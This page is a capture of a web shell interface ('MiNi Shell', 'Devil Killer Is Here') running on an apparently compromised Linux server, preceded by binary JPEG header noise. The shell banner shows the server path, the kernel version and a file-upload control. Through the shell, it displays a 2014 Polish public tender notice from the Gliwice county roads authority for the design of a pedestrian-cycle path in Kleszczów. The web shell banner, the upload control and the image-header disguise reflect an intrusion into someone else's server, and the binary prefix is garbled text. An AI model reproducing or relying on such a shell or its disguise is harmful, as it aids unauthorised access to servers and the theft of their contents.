JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140331/69065-N-2014.html

<p class="kh_header"><b>Gliwice: Opracowanie dokumentacji projektowo- kosztorysowej budowy ciągu pieszo- rowerowego przy drodze powiatowej Nr 2915S ul. Kozielska w Kleszczowie</b><br>
<b>Numer ogłoszenia: 69065 - 2014; data zamieszczenia: 31.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Zygmunta Starego 17, 44-100 Gliwice, woj. śląskie, tel. 032 2340696, faks 032 2340696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpgliwice.pzd.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo- kosztorysowej budowy ciągu pieszo- rowerowego przy drodze powiatowej Nr 2915S ul. Kozielska w Kleszczowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej na budowę ciągu pieszo- rowerowego wraz z odwodnieniem wzdłuż drogi powiatowej Nr 2915S ul. Kozielska      w Kleszczowie o długości około 780 m . Zakres obejmowałby następujące odcinki:
a)	od dojścia do kościoła do skrzyżowania z ul. Sportową - dł. 420 mb 
b)	od skrzyżowania z ul. Sportową do włączenia dwóch dróg dojazdowych do drogi powiatowej Nr 2915S na wysokości działki Nr 398/30.  - dł. 360 mb 

2.	Wykonawca bez dodatkowego wynagrodzenia uczestniczyć będzie w postępowaniu przetargowym na roboty realizowane na podstawie dokumentacji projektowej , której opracowanie stanowi przedmiot niniejszego zamówienia a w szczególności poprzez udzielanie odpowiedzi na pytania Wykonawców dotyczące przedmiotowej dokumentacji projektowej w terminie określonym przez Zamawiającego.
3.	Zamawiający wymaga przedłożenia projektu w wersji roboczej do uzgodnienia, celem akceptacji trasy oraz dokonania ewentualnych korekt rozwiązań projektowych a także uzgodnienia z Zamawiającym technologii wykonania i materiałów przewidzianych do realizacji zadania.
4.	Zamawiający wymaga , aby dokumentacja była opracowana w sposób pozwalający na etapizację robót a projekty poszczególnych etapów były skompletowane w oddzielnych teczkach.
5.	Założenia projektowe:
- zakres opracowania w istniejących granicach  pasa drogowego 
- kategoria drogi - powiatowa 
- klasa drogi- Z 
- kategoria ruchu : KR 3
- ruch pieszy i rowerowy poprowadzić razem poprzez wyznaczenie ciągu pieszo- rowerowego po stronie lewej jadąc od ul. Dworcowej w kierunku skrzyżowania z ul. Sportową.
Droga dla rowerów ( ciąg pieszo- rowerowy)- profil podłużny: 
-nie stosować pochylenia podłużnego większego niż 5 %
- w wyjątkowych przypadkach dopuszcza się większe pochylenie niwelety , jednak nie większe niż 15%
- wprowadzać rozwiązania maksymalnie ułatwiające jazdę rowerzysty w celu uniknięcia niepotrzebnych strat jego energii ( odpowiedni rodzaj nawierzchni, promienie łuków pionowych)
Droga dla rowerów ( ciąg pieszo- rowerowy) - profil poprzeczny:
- szerokość ciągu pieszo- rowerowego - co najmniej 2,5 m
6.	Wymogi bezpośredności ( czynniki wpływające na czas podróży rowerzysty)
- prędkość projektowa - 30 km/h
- średni czas stracony na oczekiwaniu - 15 s/km
- współczynnik wydłużenia - 1,2
7.	Zakres rozwiązań projektowych w ramach przedmiotu zamówienia:
a)	Projekt budowlany uwzględniający wszystkie niezbędne branże ( w tym również na ewentualne przebudowy istniejących lub kolidujących sieci i urządzeń) zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 25 kwietnia  2012 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. z 2012 r.  poz. 462) 
b)	Projekt wykonawczy dla wszystkich branż (w tym również na ewentualne przebudowy istniejących lub kolidujących sieci i urządzeń) zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202 poz. 2072 z późn.  zmianami)

             Ponadto dokumentacja winna zawierać w szczególności następujące opracowania:
a.	Projekt zagospodarowania terenu objętego opracowaniem w granicach pasa drogowego 
b.	Projekt budowy ciągu pieszo- rowerowego   
c.	Projekty obiektów inżynierskich , jeżeli takie będą wynikać z rozwiązania projektowego ( np. przepusty) 
d.	Projekt odwodnienia z uwzględnieniem wód napływających z terenów przyległych do drogi powiatowej w kierunku korpusu drogowego. 
e.	Projekty obiektów towarzyszących zlokalizowanych w graniach opracowania  w tym zjazdy ,  zatoki postojowe itp. 
f.	Projekty przełożenia lub zabezpieczenia istniejącej infrastruktury (uzbrojenie terenu) kolidujących z przebudowywaną drogą 
g.	Inwentaryzacja zieleni kolidującej z przedsięwzięciem: 
     Inwentaryzacja zieleni kolidującej zawierać musi w szczególności : lokalizację drzew i krzewów naniesioną na kopii mapy zasadniczej do celów projektowych oraz kopię mapy ewidencyjnej , wykaz drzew i krzewów z oznaczeniem gatunku, obwodu pnia mierzonego na wysokości 1,3 m lub wielkość powierzchni , z której zostaną usunięte krzewy. Wykaz drzew i krzewów należy wykonać oddzielnie dla : 
-    podlegających art. 83 ust. 1 Ustawy z dnia 16 kwietnia 2009 r. o ochronie przyrody ( tj. Dz. U. z 2009 r. Nr 151 poz. 1220 z późn. zmianami) - uzyskać stosowną decyzję administracyjną 
-    podlegających art. 83 ust. 6 Ustawy z dnia 16 kwietnia 2009 r. o ochronie przyrody ( tj. Dz. U. z 2009 r. Nr 151 poz. 1220 z późn. zmianami)
c) Specyfikacje techniczne wykonania i odbioru robót budowlanych objęte zakresem dokumentacji projektowej we wszystkich branżach wraz z opisem przedmiotu zamówienia na wykonanie robót budowlanych- stanowiący dla Zamawiającego podstawę do udzielenia zamówienia na wykonanie robót budowlanych.
d) Projekt docelowej organizacji ruchu obowiązujący po zakończeniu inwestycji wykonany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem ( Dz. U. Nr 177 poz. 1729 ) . Projekt musi być zaopiniowany przez Komendę Miejską Policji w Gliwicach, uzgodniony z poszczególnymi zarządcami dróg oraz zatwierdzony przez organ zarządzający ruchem - Starostę Powiatu gliwickiego .
e) Kosztorys inwestorski dla każdej branży wykonany zgodnie z Rozporządzeniem Ministra  Infrastruktury z  dnia  18 maja 2004 r. w  sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów  prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004  nr 130 poz. 1389.
f) Przedmiar robót dla każdej branży. Przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych).
8.	Opracowanie powinno zawierać:
a.	Projekt budowlany                                   - 5 egz. 
b.	Projekt wykonawczy                                - 5 egz. 
c.	Kosztorys inwestorki                                - 2 egz. 
d.	Przedmiar robót                                        - 2 egz. 
e.	Szczegółowe Specyfikacje Techniczne     - 3 egz.  
f.	Projekt stałej organizacji ruchu                 - 5 egz. 
g.	Plan bezpieczeństwa i ochrony zdrowia    - 3 egz.
9.	Całość dokumentacji należy dostarczyć w formie papierowej w ilości jak wyżej oraz po 1 egz w formie elektronicznej w plikach o rozszerzeniu doc (program WORD) lub pdf (program ACROBAT READER), a w przypadku kosztorysu inwestorskiego i przedmiaru robót w plikach o rozszerzeniu exe (program EXCEL).
10.	Wykonawca w ramach wynagrodzenia za dokumentację zobowiązany jest do:
- uzyskania map do celów projektowych 
- oceny warunków gruntowo- wodnych podłoża  
- opracowania operatu wodno- prawnego (dot. przypadku przyjęcia rozwiązań projektowych wymagających uzyskania pozwolenia wodno- prawnego)
- przeprowadzenia stosownie do potrzeb dodatkowych badań i ekspertyz 
- pozyskanie uzgodnień i pozwoleń instytucji i właścicieli działek, przez które przebiegać będzie projektowany ciąg pieszo- rowerowy , niezbędnych do uzyskania pozwolenia na budowę 
- w przypadku konieczności odprowadzenia wód opadowych poza pas drogowy , wykonawca winien przedstawić Zamawiającemu projekt odprowadzenia wód opadowych poza pas drogowy celem uzyskania przez Zamawiającego zgody właścicieli tych działek na realizację przyjętego rozwiązania wraz z prawem dysponowania gruntem na cele budowlane 
- uzupełnianie materiałów i udzielania stosownych wyjaśnień na wezwanie właściwego organu po złożeniu wniosku o uzyskanie pozwolenia na budowę 
- uzyskania wypisów z rejestru gruntów drogi i właścicieli działek sąsiednich. 
- wszelkie koszty związane z opłatami za uzgodnienia , wyciągi z rejestru gruntów, mapy do celów projektowych , badań geologicznych i konstrukcji jezdni itp. ponosi Wykonawca.
11.	Termin realizacji zamówienia
a)	opracowanie dokumentacji: 01.09.2014 r. 
b)	uzyskanie pozwolenia na budowę: 02.11.2014 r.
Zamawiający przewiduje zmianę terminu realizacji przedmiotu Umowy, w przypadku przedłużającego się procesu uzyskiwania stosownych opinii , decyzji i uzgodnień , jeżeli nie są one następstwem zaniedbań lub zaniechań Wykonawcy , jednak nie dłużej niż do dnia 01.12.2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany do wniesienia wadium w wysokości          600,00 zł (słownie: sześćset złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. 

Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonym oświadczeniu Wykonawcy (o treści załącznika nr 1 do formularza ofertowego) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie 3 lat przed dniem upływu terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał, a przypadku świadczeń okresowych lub ciągłych również wykonuje co najmniej 2 zamówienia o podobnym charakterze i zakresie jak przedmiot zamówienia, tj.: opracował kompleksową, wielobranżową dokumentację projektową (projekt budowlany, projekt wykonawczy oraz projekt organizacji ruchu) budowy ścieżki rowerowej lub ciągu pieszo- rowerowego o długości minimum 800 m każde wraz z załączeniem  dowodu czy zamówienie zostało wykonane należycie, a w przypadku świadczeń okresowych lub ciągłych jest wykonywane należycie,  z tym że w odniesieniu do nadal wykonywanych usług okresowych  lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
W przypadku podmiotów działających wspólnie powyższy warunek musi spełniać 1 podmiot lub  wszystkie podmioty łącznie. 
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. 
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonym oświadczeniu Wykonawcy (o treści załącznika nr 1 do formularza ofertowego) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu zamówienia, tj: zapewni zespół projektantów z uprawnieniami do projektowania w specjalności: 

a)	drogowej - co najmniej 1 osoba posiadająca uprawnienia budowlane bez ograniczeń do projektowania w specjalności drogowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na terenie kraju  z którego pochodzi osoba; osoba ta będzie koordynatorem wszystkich prac objętych przedmiotem zamówienia. Dodatkowo należy wykazać, że osoba ta  wykonała co najmniej jedną dokumentację projektową dotyczącą budowy ścieżki rowerowej lub ciągu pieszo-rowerowego o długości min. 800 m.
b)	instalacyjnej - co najmniej 1 osoba posiadająca niezbędne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, które uprawniają do projektowania lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na terenie kraju  z którego pochodzi osoba 

W przypadku podmiotów działających wspólnie powyższy warunek musi spełnić  jeden podmiot lub wszystkie podmioty łącznie.
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonych dokumentach na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych wymagań w odniesieniu do postawionego warunku. 
Ocena spełnienia wyżej wymienionego warunku dokonana zostanie w oparciu o informacje  zawarte w załączonym oświadczeniu Wykonawcy (o treści załącznika nr 1 do formularza ofertowego) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a.	Osobę/osoby upoważnione do reprezentacji Wykonawcy/Wykonawców w obrocie prawnym zgodnie z danymi ujawnionymi w KRS - rejestrze przedsiębiorców albo w ewidencji działalności gospodarczej lub Pełnomocnika.
b.	W przypadku Wykonawców wspólnie ubiegających się o zamówienie ofertę podpisuje osoba umocowana do tej czynności prawnej, co powinno wynikać z dokumentów  (pełnomocnictw) załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Podstawy wprowadzenia zmian do umowy:
a) zachodzi konieczność dostosowania postanowień umowy do zmian wynikających z nowelizacji powszechnie obowiązujących przepisów prawa z uwagi na brak możliwości realizacji umowy wedle pierwotnej jej treści;
b) przedłużeniu uległy procedury na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych;
c) zmianie uległy przepisy prawne powodujące konieczność modyfikacji opisu przedmiotu zamówienia        i wynikającą stąd pracochłonność czynności;
d) warunki atmosferyczne nie pozwoliły na sporządzenie materiałów przedprojektowych (np. inwentaryzacji);
e)  zmianie uległy stawki podatku VAT.
Aneksy zostaną sporządzone na wniosek Wykonawcy po zaakceptowaniu przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpgliwice.pzd.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych, 44-100 Gliwice, ul. Zygmunta Starego 17 -Aleksandra Wielgosz tel./ 32 234-06-96 (pok. nr 16).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 12:00, miejsce: Zarząd Dróg Powiatowych, 44-100 Gliwice, ul. Zygmunta Starego 17 - Sekretariat (pok.14).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com